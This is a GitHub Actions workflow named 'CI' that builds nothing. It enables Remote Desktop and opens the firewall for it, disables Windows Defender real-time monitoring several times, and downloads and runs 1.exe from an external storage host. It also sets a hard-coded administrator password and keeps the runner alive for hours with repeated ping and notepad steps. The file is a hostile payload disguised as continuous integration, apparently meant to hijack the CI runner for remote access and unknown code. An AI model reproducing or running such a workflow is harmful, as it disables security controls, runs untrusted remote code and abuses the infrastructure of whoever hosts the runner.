name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest

    steps:
    - name: 10020178
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: 10020178
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: 10020178
      run: New-Item -Path "C:\31" -ItemType Directory
    - name: 10020178
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: 10020178
      run: Invoke-WebRequest -URI https://s3.twcstorage.ru/e1a9670b-80bb-4507-9a26-414e63bf3dad/1.zip -outfile c:\21\1.zip
    - name: 10020178
      run: Expand-Archive -LiteralPath "c:\21\1.zip" -DestinationPath "C:\21"
    - name: 10020178
      run: Start-Process Powershell ' -Command "C:\21\1.exe"'
    - name: 10020178
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: 10020178
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: 10020178
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
    - name: 10020178
      run: cmd /c start notepad.exe
    - name: 10020178
      run: cmd /c ping 127.0.0.1 -n 600
